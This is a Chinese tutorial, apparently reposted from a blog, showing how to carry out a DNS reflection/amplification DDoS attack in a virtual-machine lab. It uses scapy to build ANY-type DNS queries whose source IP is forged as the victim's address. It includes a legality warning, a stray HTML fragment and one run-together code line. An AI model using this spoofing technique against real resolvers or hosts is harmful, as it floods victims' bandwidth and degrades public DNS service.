利用dns协议发起ddos反射攻击

编程入门 行业动态 更新时间:2024-10-11 17:26:13

利用dns协议发起ddos<a href=https://www.elefans.com/category/jswz/34/1765951.html style=反射攻击"/>

利用dns协议发起ddos反射攻击

利用DNS服务器发起反射型DDOS,攻击带宽

基本思路:
1、利用any类型的dns查询,可完成发送少量请求数据,获得大量返回数据。
2、将原请求地址改为受害者地址,则dns会向受害者返回大量数据,占用带宽

警告!

利用公共dns的攻击行为会影响dns的性能,请谨慎使用,一旦大规模占用dns资源会造成dns拥堵,属于违法犯罪行为。

实验步骤:

1、验证服务器是否可正常工作

查看网关。(Nat模式下,所有虚拟机都是在主机下的子网里,默认dns服务器地址即为网关地址)
命令:route -n

(2)登录攻击机,使用dig查询dns
命令为:dig host地址 @dns服务器地址

确认DNS服务器可用

2、抓取any查询的数据包

使用攻击机抓取数据包

使用攻击机开始dig查询

停止抓包
Pkill tcpdump

3、使用scapy分析数据包

打开scapy,读取数据包

Pcap=rdpcap(“dns.pcap”)		#读文件
Pcap[3]					#获取第4条数据,前三条为三次握手,第四条才是dns请求。

查看数据包结构

ls(DNS)
ls(DNSQR)

构造数据包:

 i=IP(src="192.168.237.128",dst="192.168.237.2")u=UDP()q=DNSQR(qname="baidu",qtype=255)d=DNS(rd=1,qdcount=1,qd=q)r=(i/u/d)
sr1(r)


确认可以成功发包。

4、使用靶机抓包

靶机打开wireshark,开启抓包。

5、使用攻击机伪造IP源,发起攻击

i=IP(src="192.168.237.132",dst="192.168.237.2")
r=(i/u/d)
sr1(r)

6、观察靶机,可以看到确实接收到了DNS服务器发来的数据包。

更多推荐

利用dns协议发起ddos反射攻击

本文发布于:2023-12-04 06:37:32,感谢您对本站的认可!
本文链接:https://www.elefans.com/category/jswz/34/1660049.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
本文标签:反射   协议   dns   ddos

发布评论

评论列表 (有 0 条评论)
草根站长

>www.elefans.com

编程频道|电子爱好者 - 技术资讯及电子产品介绍!